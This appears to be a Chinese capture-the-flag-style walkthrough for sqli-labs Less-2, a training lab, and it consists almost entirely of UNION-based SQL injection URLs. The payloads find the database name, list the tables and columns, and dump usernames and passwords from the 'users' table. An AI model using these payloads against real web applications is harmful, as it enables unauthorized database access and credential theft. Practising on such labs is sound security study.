将第一题中的id=1‘的 ‘ 去掉即可。
1)
http://127.0.0.1/sqli-labs-master/Less-2/?id=0
2)爆库payload
http://127.0.0.1/sqli-labs-master/Less-2/?id=-1 union select 1,2,database() --+
得到‘security’库名
3)爆表payload
http://127.0.0.1/sqli-labs-master/Less-2/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+
查到 emails,referers,uagents,users ,显然users是用户数据表
3)爆列名(字段)payload
http://127.0.0.1/sqli-labs-master/Less-2/?id=0 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=‘users‘ --+
4)爆值payload
http://127.0.0.1/sqli-labs-master/Less-2/?id=0 union select 1,2,group_concat(username,0x3a,password) from users--+
0x3a: 0x是十六进制标志,3a是十进制的58,是ascii中的 ‘:‘ ,用以分割pasword和username。
Less-2 GET - Error based - Intiger based (基于错误的GET整型注入)
原文:https://www.cnblogs.com/zoey-/p/10646784.html